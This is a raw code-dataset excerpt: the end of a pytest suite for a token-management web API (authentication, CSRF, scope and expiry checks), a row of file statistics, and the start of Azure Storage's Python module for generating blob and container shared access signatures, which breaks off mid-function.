"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
"actor": "example",
"action": "revoke",
"ip_address": "127.0.0.1",
"event_time": ANY,
},
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "happy token",
"scopes": ["exec:admin"],
"expires": int(new_expires.timestamp()),
"actor": "example",
"action": "edit",
"old_token_name": "some token",
"old_scopes": ["read:all"],
"old_expires": int(expires.timestamp()),
"ip_address": "127.0.0.1",
"event_time": ANY,
},
{
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "some token",
"scopes": ["read:all"],
"expires": int(expires.timestamp()),
"actor": "example",
"action": "create",
"ip_address": "127.0.0.1",
"event_time": ANY,
},
]
@pytest.mark.asyncio
async def test_token_info(setup: SetupTest) -> None:
user_info = TokenUserInfo(
username="example",
name="Example Person",
email="example@example.com",
uid=45613,
groups=[TokenGroup(name="foo", id=12313)],
)
token_service = setup.factory.create_token_service()
session_token = await token_service.create_session_token(
user_info, scopes=["exec:admin", "user:token"], ip_address="127.0.0.1"
)
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {session_token}"},
)
assert r.status_code == 200
data = r.json()
assert data == {
"token": session_token.key,
"username": "example",
"token_type": "session",
"scopes": ["exec:admin", "user:token"],
"created": ANY,
"expires": ANY,
}
now = datetime.now(tz=timezone.utc)
created = datetime.fromtimestamp(data["created"], tz=timezone.utc)
assert now - timedelta(seconds=2) <= created <= now
expires = created + timedelta(minutes=setup.config.issuer.exp_minutes)
assert datetime.fromtimestamp(data["expires"], tz=timezone.utc) == expires
r = await setup.client.get(
"/auth/api/v1/user-info",
headers={"Authorization": f"bearer {session_token}"},
)
assert r.status_code == 200
session_user_info = r.json()
assert session_user_info == {
"username": "example",
"name": "Example Person",
"email": "example@example.com",
"uid": 45613,
"groups": [
{
"name": "foo",
"id": 12313,
}
],
}
# Check the same with a user token, which has some additional associated
# data.
expires = now + timedelta(days=100)
data = await token_service.get_data(session_token)
user_token = await token_service.create_user_token(
data,
data.username,
token_name="some-token",
scopes=["exec:admin"],
expires=expires,
ip_address="127.0.0.1",
)
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {user_token}"},
)
assert r.status_code == 200
data = r.json()
assert data == {
"token": user_token.key,
"username": "example",
"token_type": "user",
"token_name": "some-token",
"scopes": ["exec:admin"],
"created": ANY,
"expires": int(expires.timestamp()),
}
r = await setup.client.get(
"/auth/api/v1/user-info",
headers={"Authorization": f"bearer {user_token}"},
)
assert r.status_code == 200
assert r.json() == session_user_info
# Test getting a list of tokens for a user.
state = State(token=session_token)
r = await setup.client.get(
"/auth/api/v1/users/example/tokens",
cookies={COOKIE_NAME: await state.as_cookie()},
)
@pytest.mark.asyncio
async def test_auth_required(setup: SetupTest) -> None:
token_data = await setup.create_session_token()
token = token_data.token
csrf = await setup.login(token)
# Replace the cookie with one containing the CSRF token but not the
# authentication token.
setup.logout()
setup.client.cookies[COOKIE_NAME] = await State(csrf=csrf).as_cookie()
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": csrf},
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 401
r = await setup.client.get("/auth/api/v1/users/example/tokens")
assert r.status_code == 401
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}"
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}/change-history"
)
assert r.status_code == 401
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 401
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 401
@pytest.mark.asyncio
async def test_csrf_required(setup: SetupTest) -> None:
token_data = await setup.create_session_token(scopes=["admin:token"])
csrf = await setup.login(token_data.token)
token_service = setup.factory.create_token_service()
user_token = await token_service.create_user_token(
token_data,
token_data.username,
token_name="foo",
scopes=[],
ip_address="127.0.0.1",
)
r = await setup.client.post(
"/auth/api/v1/tokens",
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"username": "foo", "token_type": "service"},
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/users/example/tokens", json={"token_name": "some token"}
)
assert r.status_code == 403
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{user_token.key}"
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
headers={"X-CSRF-Token": f"XXX{csrf}"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{user_token.key}",
headers={"X-CSRF-Token": f"XXX{csrf}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
@pytest.mark.asyncio
async def test_no_bootstrap(setup: SetupTest) -> None:
token_data = await setup.create_session_token()
token = token_data.token
bootstrap_token = str(setup.config.bootstrap_token)
r = await setup.client.get(
"/auth/api/v1/users/example/tokens",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.post(
"/auth/api/v1/users/example/tokens",
headers={"Authorization": f"bearer {bootstrap_token}"},
json={"token_name": "some token"},
)
assert r.status_code == 401
r = await setup.client.get(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.delete(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
)
assert r.status_code == 401
r = await setup.client.patch(
f"/auth/api/v1/users/example/tokens/{token.key}",
headers={"Authorization": f"bearer {bootstrap_token}"},
json={"token_name": "some token"},
)
assert r.status_code == 401
@pytest.mark.asyncio
async def test_no_scope(setup: SetupTest) -> None:
token_data = await setup.create_session_token()
token_service = setup.factory.create_token_service()
token = await token_service.create_user_token(
token_data,
token_data.username,
token_name="user",
scopes=[],
ip_address="127.0.0.1",
)
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"Authorization": f"bearer {token}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.delete(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
)
assert r.status_code == 403
r = await setup.client.patch(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"Authorization": f"bearer {token}"},
json={"token_name": "some token"},
)
assert r.status_code == 403
@pytest.mark.asyncio
async def test_modify_nonuser(setup: SetupTest) -> None:
token_data = await setup.create_session_token()
token = token_data.token
csrf = await setup.login(token)
r = await setup.client.patch(
f"/auth/api/v1/users/{token_data.username}/tokens/{token.key}",
headers={"X-CSRF-Token": csrf},
json={"token_name": "happy token"},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
@pytest.mark.asyncio
async def test_wrong_user(setup: SetupTest) -> None:
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
token_service = setup.factory.create_token_service()
user_info = TokenUserInfo(
username="other-person", name="Some Other Person", uid=137123
)
other_session_token = await token_service.create_session_token(
user_info, scopes=["user:token"], ip_address="127.0.0.1"
)
other_session_data = await token_service.get_data(other_session_token)
assert other_session_data
other_token = await token_service.create_user_token(
other_session_data,
"other-person",
token_name="foo",
scopes=[],
ip_address="127.0.0.1",
)
# Get a token list.
r = await setup.client.get("/auth/api/v1/users/other-person/tokens")
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Create a new user token.
r = await setup.client.post(
"/auth/api/v1/users/other-person/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "happy token"},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Get an individual token.
r = await setup.client.get(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}"
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Get the history of an individual token.
r = await setup.client.get(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}"
"/change-history"
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
# Ensure you can't see someone else's token under your username either.
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}"
)
assert r.status_code == 404
# Or their history.
r = await setup.client.get(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}"
"/change-history"
)
assert r.status_code == 404
# Delete a token.
r = await setup.client.delete(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}",
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
r = await setup.client.delete(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}",
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 404
# Modify a token.
r = await setup.client.patch(
f"/auth/api/v1/users/other-person/tokens/{other_token.key}",
json={"token_name": "happy token"},
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 403
assert r.json()["detail"][0]["type"] == "permission_denied"
r = await setup.client.patch(
f"/auth/api/v1/users/{token_data.username}/tokens/{other_token.key}",
json={"token_name": "happy token"},
headers={"X-CSRF-Token": csrf},
)
assert r.status_code == 404
@pytest.mark.asyncio
async def test_no_expires(setup: SetupTest) -> None:
"""Test creating a user token that doesn't expire."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
r = await setup.client.get(token_url)
assert "expires" not in r.json()
# Create a user token with an expiration and then adjust it to not expire.
now = datetime.now(tz=timezone.utc).replace(microsecond=0)
expires = now + timedelta(days=2)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={
"token_name": "another token",
"expires": int(expires.timestamp()),
},
)
assert r.status_code == 201
user_token = Token.from_str(r.json()["token"])
token_service = setup.factory.create_token_service()
user_token_data = await token_service.get_data(user_token)
assert user_token_data and user_token_data.expires == expires
token_url = r.headers["Location"]
r = await setup.client.get(token_url)
assert r.json()["expires"] == int(expires.timestamp())
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"expires": None},
)
assert r.status_code == 201
assert "expires" not in r.json()
# Check that the expiration was also changed in Redis.
token_service = setup.factory.create_token_service()
user_token_data = await token_service.get_data(user_token)
assert user_token_data and user_token_data.expires is None
@pytest.mark.asyncio
async def test_duplicate_token_name(setup: SetupTest) -> None:
"""Test duplicate token names."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "duplicate_token_name"
# Create a token with a different name and then try to modify the name to
# conflict.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "another token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "duplicate_token_name"
@pytest.mark.asyncio
async def test_bad_expires(setup: SetupTest) -> None:
"""Test creating or modifying a token with bogus expirations."""
token_data = await setup.create_session_token()
csrf = await setup.login(token_data.token)
now = int(time.time())
bad_expires = [-now, -1, 0, now, now + (5 * 60) - 1]
for bad_expire in bad_expires:
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "expires": bad_expire},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "expires"]
assert data["detail"][0]["type"] == "invalid_expires"
# Create a valid token.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token"},
)
assert r.status_code == 201
token_url = r.headers["Location"]
# Now try modifying the expiration time to the same bogus values.
for bad_expire in bad_expires:
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"expires": bad_expire},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "expires"]
assert data["detail"][0]["type"] == "invalid_expires"
@pytest.mark.asyncio
async def test_bad_scopes(setup: SetupTest) -> None:
"""Test creating or modifying a token with bogus scopes."""
known_scopes = list(setup.config.known_scopes.keys())
assert len(known_scopes) > 4
token_data = await setup.create_session_token(
scopes=known_scopes[1:3] + ["other:scope", "user:token"]
)
csrf = await setup.login(token_data.token)
# Check that we reject both an unknown scope and a scope that's present on
# the session but isn't valid in the configuration.
for bad_scope in (known_scopes[3], "other:scope"):
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "scopes": [bad_scope]},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "scopes"]
assert data["detail"][0]["type"] == "invalid_scopes"
# Create a valid token with all of the scopes as the session.
r = await setup.client.post(
f"/auth/api/v1/users/{token_data.username}/tokens",
headers={"X-CSRF-Token": csrf},
json={"token_name": "some token", "scopes": known_scopes[1:3]},
)
assert r.status_code == 201
token_url = r.headers["Location"]
# Now try modifying it with the invalid scope.
for bad_scope in (known_scopes[3], "other:scope"):
r = await setup.client.patch(
token_url,
headers={"X-CSRF-Token": csrf},
json={"scopes": [known_scopes[1], bad_scope]},
)
assert r.status_code == 422
data = r.json()
assert data["detail"][0]["loc"] == ["body", "scopes"]
assert data["detail"][0]["type"] == "invalid_scopes"
@pytest.mark.asyncio
async def test_create_admin(setup: SetupTest) -> None:
"""Test creating a token through the admin interface."""
token_data = await setup.create_session_token(scopes=["exec:admin"])
csrf = await setup.login(token_data.token)
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": csrf},
json={"username": "a-service", "token_type": "service"},
)
assert r.status_code == 403
token_data = await setup.create_session_token(scopes=["admin:token"])
csrf = await setup.login(token_data.token)
now = datetime.now(tz=timezone.utc)
expires = int((now + timedelta(days=2)).timestamp())
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"X-CSRF-Token": csrf},
json={
"username": "a-service",
"token_type": "service",
"scopes": ["admin:token"],
"expires": expires,
"name": "A Service",
"uid": 1234,
"email": "service@example.com",
"groups": [{"name": "some-group", "id": 12381}],
},
)
assert r.status_code == 201
assert r.json() == {"token": ANY}
service_token = Token.from_str(r.json()["token"])
token_url = f"/auth/api/v1/users/a-service/tokens/{service_token.key}"
assert r.headers["Location"] == token_url
setup.logout()
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {str(service_token)}"},
)
assert r.status_code == 200
assert r.json() == {
"token": service_token.key,
"username": "a-service",
"token_type": "service",
"scopes": ["admin:token"],
"created": ANY,
"expires": expires,
}
r = await setup.client.get(
"/auth/api/v1/user-info",
headers={"Authorization": f"bearer {str(service_token)}"},
)
assert r.status_code == 200
assert r.json() == {
"username": "a-service",
"name": "A Service",
"email": "service@example.com",
"uid": 1234,
"email": "service@example.com",
"groups": [{"name": "some-group", "id": 12381}],
}
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={"username": "a-user", "token_type": "session"},
)
assert r.status_code == 422
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={"username": "a-user", "token_type": "user"},
)
assert r.status_code == 422
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={
"username": "a-user",
"token_type": "user",
"token_name": "some token",
"expires": int(datetime.now(tz=timezone.utc).timestamp()),
},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "invalid_expires"
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={
"username": "a-user",
"token_type": "user",
"token_name": "some token",
"scopes": ["bogus:scope"],
},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "invalid_scopes"
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={
"username": "a-user",
"token_type": "user",
"token_name": "some token",
},
)
assert r.status_code == 201
assert r.json() == {"token": ANY}
user_token = Token.from_str(r.json()["token"])
token_url = f"/auth/api/v1/users/a-user/tokens/{user_token.key}"
assert r.headers["Location"] == token_url
# Successfully create a user token.
r = await setup.client.get(
"/auth/api/v1/token-info",
headers={"Authorization": f"bearer {str(user_token)}"},
)
assert r.status_code == 200
assert r.json() == {
"token": user_token.key,
"username": "a-user",
"token_type": "user",
"token_name": "some token",
"scopes": [],
"created": ANY,
}
r = await setup.client.get(
"/auth/api/v1/user-info",
headers={"Authorization": f"bearer {str(user_token)}"},
)
assert r.status_code == 200
assert r.json() == {"username": "a-user"}
# Check handling of duplicate token name errors.
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={
"username": "a-user",
"token_type": "user",
"token_name": "some token",
},
)
assert r.status_code == 422
assert r.json()["detail"][0]["type"] == "duplicate_token_name"
# Check handling of an invalid username.
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={"Authorization": f"bearer {str(service_token)}"},
json={
"username": "invalid(user)",
"token_type": "user",
"token_name": "some token",
},
)
assert r.status_code == 422
# Check that the bootstrap token also works.
r = await setup.client.post(
"/auth/api/v1/tokens",
headers={
"Authorization": f"bearer {str(setup.config.bootstrap_token)}"
},
json={"username": "other-service", "token_type": "service"},
)
assert r.status_code == 201
| 33.180498 | 78 | 0.597949 | 4,050 | 31,986 | 4.597531 | 0.071852 | 0.055317 | 0.047261 | 0.07304 | 0.801235 | 0.779646 | 0.746885 | 0.727712 | 0.700967 | 0.686037 | 0 | 0.019917 | 0.248109 | 31,986 | 963 | 79 | 33.214953 | 0.754304 | 0.06184 | 0 | 0.673267 | 0 | 0 | 0.262931 | 0.086375 | 0 | 0 | 0 | 0 | 0.159653 | 1 | 0 | false | 0 | 0.017327 | 0 | 0.017327 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b95f8901e0c33eb0c48b0e42f7b1bec99e53a7a7 | 29,885 | py | Python | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 3 | 2019-02-21T20:46:26.000Z | 2021-06-22T15:35:52.000Z | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 11 | 2017-10-05T18:20:40.000Z | 2020-10-10T09:20:19.000Z | azure/multiapi/storagev2/blob/v2019_12_12/_shared_access_signature.py | xolve/azure-multiapi-storage-python | 47509479427c879f18c554e451e838453d47c2bd | [
"MIT"
] | 15 | 2017-10-02T18:48:20.000Z | 2022-03-03T14:03:49.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from typing import ( # pylint: disable=unused-import
Union, Optional, Any, TYPE_CHECKING
)
from ._shared import sign_string, url_quote
from ._shared.constants import X_MS_VERSION
from ._shared.models import Services
from ._shared.shared_access_signature import SharedAccessSignature, _SharedAccessHelper, \
QueryStringConstants
if TYPE_CHECKING:
from datetime import datetime
from .import (
ResourceTypes,
AccountSasPermissions,
UserDelegationKey,
ContainerSasPermissions,
BlobSasPermissions
)
class BlobQueryStringConstants(object):
SIGNED_TIMESTAMP = 'snapshot'
class BlobSharedAccessSignature(SharedAccessSignature):
'''
Provides a factory for creating blob and container access
signature tokens with a common account name and account key. Users can either
use the factory or can construct the appropriate service and use the
generate_*_shared_access_signature method directly.
'''
def __init__(self, account_name, account_key=None, user_delegation_key=None):
'''
:param str account_name:
The storage account name used to generate the shared access signatures.
:param str account_key:
The access key to generate the shares access signatures.
:param ~azure.storage.blob.models.UserDelegationKey user_delegation_key:
Instead of an account key, the user could pass in a user delegation key.
A user delegation key can be obtained from the service by authenticating with an AAD identity;
this can be accomplished by calling get_user_delegation_key on any Blob service object.
'''
super(BlobSharedAccessSignature, self).__init__(account_name, account_key, x_ms_version=X_MS_VERSION)
self.user_delegation_key = user_delegation_key
def generate_blob(self, container_name, blob_name, snapshot=None, version_id=None, permission=None,
expiry=None, start=None, policy_id=None, ip=None, protocol=None,
cache_control=None, content_disposition=None,
content_encoding=None, content_language=None,
content_type=None):
'''
Generates a shared access signature for the blob or one of its snapshots.
Use the returned signature with the sas_token parameter of any BlobService.
:param str container_name:
Name of container.
:param str blob_name:
Name of blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that,
when present, specifies the blob snapshot to grant permission.
:param BlobSasPermissions permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
set_blob_service_properties.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:param str protocol:
Specifies the protocol permitted for a request made. The default value
is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values.
:param str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:param str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:param str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:param str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:param str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
'''
resource_path = container_name + '/' + blob_name
sas = _BlobSharedAccessHelper()
sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version)
sas.add_id(policy_id)
resource = 'bs' if snapshot else 'b'
resource = 'bv' if version_id else resource
sas.add_resource(resource)
sas.add_timestamp(snapshot or version_id)
sas.add_override_response_headers(cache_control, content_disposition,
content_encoding, content_language,
content_type)
sas.add_resource_signature(self.account_name, self.account_key, resource_path,
user_delegation_key=self.user_delegation_key)
return sas.get_token()
def generate_container(self, container_name, permission=None, expiry=None,
start=None, policy_id=None, ip=None, protocol=None,
cache_control=None, content_disposition=None,
content_encoding=None, content_language=None,
content_type=None):
'''
Generates a shared access signature for the container.
Use the returned signature with the sas_token parameter of any BlobService.
:param str container_name:
Name of container.
:param ContainerSasPermissions permission:
The permissions associated with the shared access signature. The
user is restricted to operations allowed by the permissions.
Permissions must be ordered read, write, delete, list.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has been
specified in an associated stored access policy.
:param expiry:
The time at which the shared access signature becomes invalid.
Required unless an id is given referencing a stored access policy
which contains this field. This field must be omitted if it has
been specified in an associated stored access policy. Azure will always
convert values to UTC. If a date is passed in without timezone info, it
is assumed to be UTC.
:type expiry: datetime or str
:param start:
The time at which the shared access signature becomes valid. If
omitted, start time for this call is assumed to be the time when the
storage service receives the request. Azure will always convert values
to UTC. If a date is passed in without timezone info, it is assumed to
be UTC.
:type start: datetime or str
:param str policy_id:
A unique value up to 64 characters in length that correlates to a
stored access policy. To create a stored access policy, use
set_blob_service_properties.
:param str ip:
Specifies an IP address or a range of IP addresses from which to accept requests.
If the IP address from which the request originates does not match the IP address
or address range specified on the SAS token, the request is not authenticated.
For example, specifying sip=168.1.5.65 or sip=168.1.5.60-168.1.5.70 on the SAS
restricts the request to those IP addresses.
:param str protocol:
Specifies the protocol permitted for a request made. The default value
is https,http. See :class:`~azure.storage.common.models.Protocol` for possible values.
:param str cache_control:
Response header value for Cache-Control when resource is accessed
using this shared access signature.
:param str content_disposition:
Response header value for Content-Disposition when resource is accessed
using this shared access signature.
:param str content_encoding:
Response header value for Content-Encoding when resource is accessed
using this shared access signature.
:param str content_language:
Response header value for Content-Language when resource is accessed
using this shared access signature.
:param str content_type:
Response header value for Content-Type when resource is accessed
using this shared access signature.
'''
sas = _BlobSharedAccessHelper()
sas.add_base(permission, expiry, start, ip, protocol, self.x_ms_version)
sas.add_id(policy_id)
sas.add_resource('c')
sas.add_override_response_headers(cache_control, content_disposition,
content_encoding, content_language,
content_type)
sas.add_resource_signature(self.account_name, self.account_key, container_name,
user_delegation_key=self.user_delegation_key)
return sas.get_token()
class _BlobSharedAccessHelper(_SharedAccessHelper):
def add_timestamp(self, timestamp):
self._add_query(BlobQueryStringConstants.SIGNED_TIMESTAMP, timestamp)
def get_value_to_append(self, query):
return_value = self.query_dict.get(query) or ''
return return_value + '\n'
def add_resource_signature(self, account_name, account_key, path, user_delegation_key=None):
# pylint: disable = no-member
if path[0] != '/':
path = '/' + path
canonicalized_resource = '/blob/' + account_name + path + '\n'
# Form the string to sign from shared_access_policy and canonicalized
# resource. The order of values is important.
string_to_sign = \
(self.get_value_to_append(QueryStringConstants.SIGNED_PERMISSION) +
self.get_value_to_append(QueryStringConstants.SIGNED_START) +
self.get_value_to_append(QueryStringConstants.SIGNED_EXPIRY) +
canonicalized_resource)
if user_delegation_key is not None:
self._add_query(QueryStringConstants.SIGNED_OID, user_delegation_key.signed_oid)
self._add_query(QueryStringConstants.SIGNED_TID, user_delegation_key.signed_tid)
self._add_query(QueryStringConstants.SIGNED_KEY_START, user_delegation_key.signed_start)
self._add_query(QueryStringConstants.SIGNED_KEY_EXPIRY, user_delegation_key.signed_expiry)
self._add_query(QueryStringConstants.SIGNED_KEY_SERVICE, user_delegation_key.signed_service)
self._add_query(QueryStringConstants.SIGNED_KEY_VERSION, user_delegation_key.signed_version)
string_to_sign += \
(self.get_value_to_append(QueryStringConstants.SIGNED_OID) +
self.get_value_to_append(QueryStringConstants.SIGNED_TID) +
self.get_value_to_append(QueryStringConstants.SIGNED_KEY_START) +
self.get_value_to_append(QueryStringConstants.SIGNED_KEY_EXPIRY) +
self.get_value_to_append(QueryStringConstants.SIGNED_KEY_SERVICE) +
self.get_value_to_append(QueryStringConstants.SIGNED_KEY_VERSION))
else:
string_to_sign += self.get_value_to_append(QueryStringConstants.SIGNED_IDENTIFIER)
string_to_sign += \
(self.get_value_to_append(QueryStringConstants.SIGNED_IP) +
self.get_value_to_append(QueryStringConstants.SIGNED_PROTOCOL) +
self.get_value_to_append(QueryStringConstants.SIGNED_VERSION) +
self.get_value_to_append(QueryStringConstants.SIGNED_RESOURCE) +
self.get_value_to_append(BlobQueryStringConstants.SIGNED_TIMESTAMP) +
self.get_value_to_append(QueryStringConstants.SIGNED_CACHE_CONTROL) +
self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_DISPOSITION) +
self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_ENCODING) +
self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_LANGUAGE) +
self.get_value_to_append(QueryStringConstants.SIGNED_CONTENT_TYPE))
# remove the trailing newline
if string_to_sign[-1] == '\n':
string_to_sign = string_to_sign[:-1]
self._add_query(QueryStringConstants.SIGNED_SIGNATURE,
sign_string(account_key if user_delegation_key is None else user_delegation_key.value,
string_to_sign))
def get_token(self):
# a conscious decision was made to exclude the timestamp in the generated token
# this is to avoid having two snapshot ids in the query parameters when the user appends the snapshot timestamp
exclude = [BlobQueryStringConstants.SIGNED_TIMESTAMP]
return '&'.join(['{0}={1}'.format(n, url_quote(v))
for n, v in self.query_dict.items() if v is not None and n not in exclude])
def generate_account_sas(
account_name, # type: str
account_key, # type: str
resource_types, # type: Union[ResourceTypes, str]
permission, # type: Union[AccountSasPermissions, str]
expiry, # type: Optional[Union[datetime, str]]
